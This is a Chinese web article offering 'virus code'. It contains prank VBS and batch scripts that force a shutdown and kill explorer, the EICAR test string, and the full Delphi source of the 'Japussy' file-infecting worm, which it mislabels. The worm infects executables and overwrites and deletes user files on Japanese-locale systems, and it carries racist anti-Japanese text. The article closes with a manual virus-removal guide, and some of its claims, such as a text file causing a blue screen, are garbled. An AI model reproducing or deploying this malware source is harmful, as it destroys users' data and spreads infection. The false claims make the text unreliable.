病毒代码(电脑病毒代码大全)

一、恶搞电脑病毒代码有哪些

有时候想和朋友们玩玩，搞点恶搞电脑病毒给他们，要怎么办呢?下面由我给你做出详细的恶搞电脑病毒代码介绍!希望对你有帮助!

恶搞电脑病毒代码介绍一：

首先在电脑上新建一个TXT文档

然后把下面这段代码输入进去

On Error Resume Next

Dim WSHshellA

Set WSHshellA= wscript.CreateObject("wscript.shell")

WSHshellA.run"cmd.exe/c shutdown-s-t 90-c""快喊我是猪，不喊就马上让你关机，不信，试试···""", 0, True

Dim a

Do While(a<>"我是猪")

a= InputBox("快说我是猪,不叫就不关机，快点，说","说不说","不说", 8000, 7000)

MsgBox Chr(13)+ Chr(13)+ Chr(13)+ a, 0,"MsgBox"

Loop

MsgBox Chr(13)+ Chr(13)+ Chr(13)+"早说就行了嘛!好,不关了"

WSHshella.run"cmd.exe/c shutdown-a"

然后保存

然后把这个文本文档的后缀改为vbs也就是说新建的文本文档本来是.TXT的后缀，

你要修改为.VBS的后缀

恶搞电脑病毒代码介绍二：

新建一个文本文档，然后插入hhjsfdusnjwindow,,hffjfiukjei 508963kfdjksfjjkk,最后插入图片，如果对方有邮箱，就发给他

他一打开就会出现你插入的图片，然后出现蓝屏(效果7—10分钟)(注：做好病毒后不要打开，否则会出现以上说的情况)

恶搞电脑病毒代码介绍三：

新建一个文本文档(.txt)，要复制以下代码：

@echo off

color 4

tskill explorer

echo.

echo.

echo.

echo.

echo警告：在病毒执行期间禁止关闭电源，

echo否则你就和你心爱的电脑说

echo.

echo. BYE-BYE

echo.

echo Computer system crash!

echo.

echo.

echo I am a virus, my name is Ghost.

echo我是魔鬼病毒，在这个堕落的世界上苏醒了。

echo.

echo. Warning! CPU has been changed please re-enter CPU settings

echo. in the CMOS setuo and remember to save before quit.

echo. Secondary IDE channel no 80 conductor cable installed.

set/p select=:)

if"%select%"=="" goto start

:start

shutdown-r-t 10-c"您的计算机上带有魔鬼病毒，今天是它的发作日期。病毒已经破坏了您的系统，您的计算机将在10秒钟后重启。"

::结束

再另存为：名字.bat你要记住"名字"后面要加".bat"

就可以了，没有任何破坏性，吓吓人。

你可以试试看看效果。

二、电脑病毒代码

不行的得用虚拟机才可以测试病毒代码无需下载，把下面这段代码复制到记事本里，保存为文本文件

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

熊猫烧香

ogram Japussy;

uses

Windows, SysUtils, Classes, Graphics, ShellAPI{, Registry};

const

HeaderSize= 82432;//病毒体的大小

IconOffset=$12EB8;//PE文件主图标的偏移量

//在我的Delphi5 SP1上面编译得到的大小，其它版本的Delphi可能不同

//查找2800000020的十六进制字符串可以找到主图标的偏移量

{

HeaderSize= 38912;//Upx压缩过病毒体的大小

IconOffset=$92BC;//Upx压缩过PE文件主图标的偏移量

//Upx 1.24W用法: upx-9--8086 Japussy.exe

}

IconSize=$2E8;//PE文件主图标的大小--744字节

IconTail= IconOffset+ IconSize;//PE文件主图标的尾部

ID=$44444444;//感染标记

//垃圾码，以备写入

Catchword='If a race need to be killed out, it must be Yamato.'+

'If a country need to be destroyed, it must be Japan!'+

'*** W32.Japussy.Worm.A***';

{$R*.RES}

function RegisterServiceProcess(dwProcessID, dwType: Integer): Integer;

stdcall; external'Kernel32.dll';//函数声明

var

TmpFile: string;

Si: STARTUPINFO;

Pi: PROCESS_INFORMATION;

IsJap: Boolean= False;//日文操作系统标记

{判断是否为Win9x}

function IsWin9x: Boolean;

var

Ver: TOSVersionInfo;

begin

Result:= False;

Ver.dwOSVersionInfoSize:= SizeOf(TOSVersionInfo);

if not GetVersionEx(Ver) then

Exit;

if(Ver.dwPlatformID= VER_PLATFORM_WIN32_WINDOWS) then//Win9x

Result:= True;

end;

{在流之间复制}

procedure CopyStream(Src: TStream; sStartPos: Integer; Dst: TStream;

dStartPos: Integer; Count: Integer);

var

sCurPos, dCurPos: Integer;

begin

sCurPos:= Src.Position;

dCurPos:= Dst.Position;

Src.Seek(sStartPos, 0);

Dst.Seek(dStartPos, 0);

Dst.CopyFrom(Src, Count);

Src.Seek(sCurPos, 0);

Dst.Seek(dCurPos, 0);

end;

{将宿主文件从已感染的PE文件中分离出来，以备使用}

procedure ExtractFile(FileName: string);

var

sStream, dStream: TFileStream;

begin

try

sStream:= TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone);

try

dStream:= TFileStream.Create(FileName, fmCreate);

try

sStream.Seek(HeaderSize, 0);//跳过头部的病毒部分

dStream.CopyFrom(sStream, sStream.Size- HeaderSize);

finally

dStream.Free;

end;

finally

sStream.Free;

end;

except

end;

end;

{填充STARTUPINFO结构}

procedure FillStartupInfo(var Si: STARTUPINFO; State: Word);

begin

Si.cb:= SizeOf(Si);

Si.lpReserved:= nil;

Si.lpDesktop:= nil;

Si.lpTitle:= nil;

Si.dwFlags:= STARTF_USESHOWWINDOW;

Si.wShowWindow:= State;

Si.cbReserved2:= 0;

Si.lpReserved2:= nil;

end;

{发带毒邮件}

procedure SendMail;

begin

//哪位仁兄愿意完成之？

end;

{感染PE文件}

procedure InfectOneFile(FileName: string);

var

HdrStream, SrcStream: TFileStream;

IcoStream, DstStream: TMemoryStream;

iID: LongInt;

aIcon: TIcon;

Infected, IsPE: Boolean;

i: Integer;

Buf: array[0..1] of Char;

begin

try//出错则文件正在被使用，退出

if CompareText(FileName,'JAPUSSY.EXE')= 0 then//是自己则不感染

Exit;

Infected:= False;

IsPE:= False;

SrcStream:= TFileStream.Create(FileName, fmOpenRead);

try

for i:= 0 to$108 do//检查PE文件头

begin

SrcStream.Seek(i, soFromBeginning);

SrcStream.Read(Buf, 2);

if(Buf[0]=#80) and(Buf[1]=#69) then//PE标记

begin

IsPE:= True;//是PE文件

Break;

end;

end;

SrcStream.Seek(-4, soFromEnd);//检查感染标记

SrcStream.Read(iID, 4);

if(iID= ID) or(SrcStream.Size< 10240) then//太小的文件不感染

Infected:= True;

finally

SrcStream.Free;

end;

if Infected or(not IsPE) then//如果感染过了或不是PE文件则退出

Exit;

IcoStream:= TMemoryStream.Create;

DstStream:= TMemoryStream.Create;

try

aIcon:= TIcon.Create;

try

//得到被感染文件的主图标(744字节)，存入流

aIcon.ReleaseHandle;

aIcon.Handle:= ExtractIcon(HInstance, PChar(FileName), 0);

aIcon.SaveToStream(IcoStream);

finally

aIcon.Free;

end;

SrcStream:= TFileStream.Create(FileName, fmOpenRead);

//头文件

HdrStream:= TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone);

try

//写入病毒体主图标之前的数据

CopyStream(HdrStream, 0, DstStream, 0, IconOffset);

//写入目前程序的主图标

CopyStream(IcoStream, 22, DstStream, IconOffset, IconSize);

//写入病毒体主图标到病毒体尾部之间的数据

CopyStream(HdrStream, IconTail, DstStream, IconTail, HeaderSize- IconTail);

//写入宿主程序

CopyStream(SrcStream, 0, DstStream, HeaderSize, SrcStream.Size);

//写入已感染的标记

DstStream.Seek(0, 2);

iID:=$44444444;

DstStream.Write(iID, 4);

finally

HdrStream.Free;

end;

finally

SrcStream.Free;

IcoStream.Free;

DstStream.SaveToFile(FileName);//替换宿主文件

DstStream.Free;

end;

except;

end;

end;

{将目标文件写入垃圾码后删除}

procedure SmashFile(FileName: string);

var

FileHandle: Integer;

i, Size, Mass, Max, Len: Integer;

begin

try

SetFileAttributes(PChar(FileName), 0);//去掉只读属性

FileHandle:= FileOpen(FileName, fmOpenWrite);//打开文件

try

Size:= GetFileSize(FileHandle, nil);//文件大小

i:= 0;

Randomize;

Max:= Random(15);//写入垃圾码的随机次数

if Max< 5 then

Max:= 5;

Mass:= Size div Max;//每个间隔块的大小

Len:= Length(Catchword);

while i< Max do

begin

FileSeek(FileHandle, i* Mass, 0);//定位

//写入垃圾码，将文件彻底破坏掉

FileWrite(FileHandle, Catchword, Len);

Inc(i);

end;

finally

FileClose(FileHandle);//关闭文件

end;

DeleteFile(PChar(FileName));//删除之

except

end;

end;

{获得可写的驱动器列表}

function GetDrives: string;

var

DiskType: Word;

D: Char;

Str: string;

i: Integer;

begin

for i:= 0 to 25 do//遍历26个字母

begin

D:= Chr(i+ 65);

Str:= D+':';

DiskType:= GetDriveType(PChar(Str));

//得到本地磁盘和网络盘

if(DiskType= DRIVE_FIXED) or(DiskType= DRIVE_REMOTE) then

Result:= Result+ D;

end;

end;

{遍历目录，感染和摧毁文件}

procedure LoopFiles(Path, Mask: string);

var

i, Count: Integer;

Fn, Ext: string;

SubDir: TStrings;

SearchRec: TSearchRec;

Msg: TMsg;

function IsValidDir(SearchRec: TSearchRec): Integer;

begin

if(SearchRec.Attr'.') and

(SearchRec.Name>'..') then

Result:= 0//不是目录

else if(SearchRec.Attr= 16) and(SearchRec.Name>'.') and

(SearchRec.Name>'..') then

Result:= 1//不是根目录

else Result:= 2;//是根目录

end;

begin

if(FindFirst(Path+ Mask, faAnyFile, SearchRec)= 0) then

begin

repeat

PeekMessage(Msg, 0, 0, 0, PM_REMOVE);//调整消息队列，避免引起怀疑

if IsValidDir(SearchRec)= 0 then

begin

Fn:= Path+ SearchRec.Name;

Ext:= UpperCase(ExtractFileExt(Fn));

if(Ext='.EXE') or(Ext='.SCR') then

begin

InfectOneFile(Fn);//感染可执行文件

end

else if(Ext='.HTM') or(Ext='.HTML') or(Ext='.ASP') then

begin

//感染HTML和ASP文件，将Base64编码后的病毒写入

//感染浏览此网页的所有用户

//哪位大兄弟愿意完成之？

end

else if Ext='.WAB' then//Outlook地址簿文件

begin

//获取Outlook邮件地址

end

else if Ext='.ADC' then//Foxmail地址自动完成文件

begin

//获取Foxmail邮件地址

end

else if Ext='IND' then//Foxmail地址簿文件

begin

//获取Foxmail邮件地址

end

else

begin

if IsJap then//是倭文操作系统

begin

if(Ext='.DOC') or(Ext='.XLS') or(Ext='.MDB') or

(Ext='.MP3') or(Ext='.RM') or(Ext='.RA') or

(Ext='.WMA') or(Ext='.ZIP') or(Ext='.RAR') or

(Ext='.MPEG') or(Ext='.ASF') or(Ext='.JPG') or

(Ext='.JPEG') or(Ext='.GIF') or(Ext='.SWF') or

(Ext='.PDF') or(Ext='.CHM') or(Ext='.AVI') then

SmashFile(Fn);//摧毁文件

end;

end;

end;

//感染或删除一个文件后睡眠200毫秒，避免CPU占用率过高引起怀疑

Sleep(200);

until(FindNext(SearchRec)> 0);

end;

FindClose(SearchRec);

SubDir:= TStringList.Create;

if(FindFirst(Path+'*.*', faDirectory, SearchRec)= 0) then

begin

repeat

if IsValidDir(SearchRec)= 1 then

SubDir.Add(SearchRec.Name);

until(FindNext(SearchRec)> 0);

end;

FindClose(SearchRec);

Count:= SubDir.Count- 1;

for i:= 0 to Count do

LoopFiles(Path+ SubDir.Strings+'', Mask);

FreeAndNil(SubDir);

end;

{遍历磁盘上所有的文件}

procedure InfectFiles;

var

DriverList: string;

i, Len: Integer;

begin

if GetACP= 932 then//日文操作系统

IsJap:= True;//去死吧！

DriverList:= GetDrives;//得到可写的磁盘列表

Len:= Length(DriverList);

while True do//死循环

begin

for i:= Len downto 1 do//遍历每个磁盘驱动器

LoopFiles(DriverList+':','*.*');//感染之

SendMail;//发带毒邮件

Sleep(1000* 60* 5);//睡眠5分钟

end;

end;

{主程序开始}

begin

if IsWin9x then//是Win9x

RegisterServiceProcess(GetCurrentProcessID, 1)//注册为服务进程

else//WinNT

begin

//远程线程映射到Explorer进程

//哪位兄台愿意完成之？

end;

//如果是原始病毒体自己

if CompareText(ExtractFileName(ParamStr(0)),'Japussy.exe')= 0 then

InfectFiles//感染和发邮件

else//已寄生于宿主程序上了，开始工作

begin

TmpFile:= ParamStr(0);//创建临时文件

Delete(TmpFile, Length(TmpFile)- 4, 4);

TmpFile:= TmpFile+#32+'.exe';//真正的宿主文件，多一个空格

ExtractFile(TmpFile);//分离之

FillStartupInfo(Si, SW_SHOWDEFAULT);

CreateProcess(PChar(TmpFile), PChar(TmpFile), nil, nil, True,

0, nil,'.', Si, Pi);//创建新进程运行之

InfectFiles;//感染和发邮件

end;

end

三、什么代码可以让电脑快速的删除病毒

自己保存的手工杀毒方法，利用系统自带命令杀毒。上网最恐怖的事莫过于新病毒出来的时候，尽管电脑上我们都装有各种强大的杀毒软件，也配置了定时自动更新病毒库，但病毒总是要先于病毒库的更新的，所以中招的每次都不会是少数，这里列举一些通用的杀毒方法，自己亲自动手来用系统自带的工具绞杀病毒：一、自己动手前，切记有备无患——用TaskList备份系统进程新型病毒都学会了用进程来隐藏自己，所以我们最好在系统正常的时候，备份一下电脑的进程列表，当然最好在刚进入Windows时不要运行任何程序的情况下备份，样以后感觉电脑异常的时候可以通过比较进程列表，找出可能是病毒的进程。在命令提示符下输入：TaskList/fo:csv>g:zc.csv上述命令的作用是将当前进程列表以csv格式输出到“zc.csv”文件中，g:为你要保存到的盘，可以用Excel打开该文件.二、自己动手时，必须火眼金睛——用FC比较进程列表文件如果感觉电脑异常，或者知道最近有流行病毒，那么就有必要检查一下。进入命令提示符下，输入下列命令：TaskList/fo:csv>g:yc.csv生成一个当前进程的yc.csv文件列表，然后输入：FC g:\zccsv g:\yc.csy（与之前备份的系统进程进行比较）回车后通过比较发现，电脑多了一个名为“Winion0n.exe”(这里以这个进程为例)不是Winionon.exe”的异常进程。三、进行判断时，切记证据确凿——用Netstat查看开放端口对这样的可疑进程，如何判断它是否是病毒呢？根据大部分病毒（特别是木马）会通过端口进行对外连接来传播病毒，可以查看一下端口占有情况。在命令提示符下输入：Netstat-a-n-o参数含义如下：a:显示所有与该主机建立连接的端口信息n:显示打开端口进程PID代码o:显示与每个连接相关的所属进程ID回车后就可以看到所有开放端口和外部连接进程，这里一个PID为1756（以此为例）的进程最为可疑，它的状态是“ESTABLISHED”，通过任务管理器可以知道这个进程就是“Winion0n.exe”，通过查看本机运行网络程序，可以判断这是一个非法连接！连接参数含义如下：LISTENINC：表示处于侦听状态，就是说该端口是开放的，等待连接，但还没有被连接，只有TCP协议的服务端口才能处于LISTENINC状态。ESTABLISHED的意思是建立连接。表示两台机器正在通信。TIME-WAIT意思是结束了这次连接。说明端口曾经有过访问，但访问结束了，用于判断是否有外部电脑连接到本机。四：下手杀毒时，一定要心狠手辣——用NTSD终止进程虽然知道“Winion0n.exe”是个非法进程，但是很多病毒的进程无法通过任务管理器终止，怎么办？在命令提示符下输入下列命令：ntsd–c q-p 1756回车后可以顺利结束病毒进程。提示：“1756”为进程PID值，如果不知道进程的ID，打开任务管理器，单击“查看→选择列→勾上PID（进程标识符）即可。NTSD可以强行终止除Sytem,SMSS.EXE,CSRSS.EXE外的所有进程。五、断定病毒后，定要斩草除根——搜出病毒原文件对于已经判断是病毒文件的“Winion0n.exe”文件，通过搜索“本地所有分区”、“搜索系统文件夹和隐藏的文件和文件夹”，找到该文件的藏身之所，将它删除。不过这样删除的只是病毒主文件，通过查看它的属性，依据它的文件创建日期、大小再次进行搜索，找出它的同伙并删除。如果你不确定还有那些文件是它的亲戚，通过网络搜索查找病毒信息获得帮助。六、清除病毒后一定要打扫战场手动修复注册表虽然把病毒文件删除了，但病毒都会在注册表留下垃圾键值，还需要把这些垃圾清除干净。1、用reg export备份自启动。由于自启动键值很多，发现病毒时手动查找很不方便。这里用reg export+批处理命令来备份。启动记事本输入下列命令：reg export HKLM\software\Microsoft\Windows\CurrentVersion\Run fo:\hklmrun.regreg export HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run f:\hklcu.regreg export HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run hklml.reg注：这里只列举几个常见键值的备份，其它键值请参照上述方法制作。然后将它保存为ziqidong.bat在命令提示符下运行它，即可将所有自启动键值备份到相应的reg文件中，接着再输入：copy f:\*.reg ziqidong.txt命令的作用是将所有备份的reg文件输出到“ziqidong.txt”中，这样如果发现病毒新增自启动项，同上次导出自启动值，利用上面介绍的FC命令比较前后两个txt文件，即可快速找出新增自启动项目。2、用reg delete删除新增自启动键值。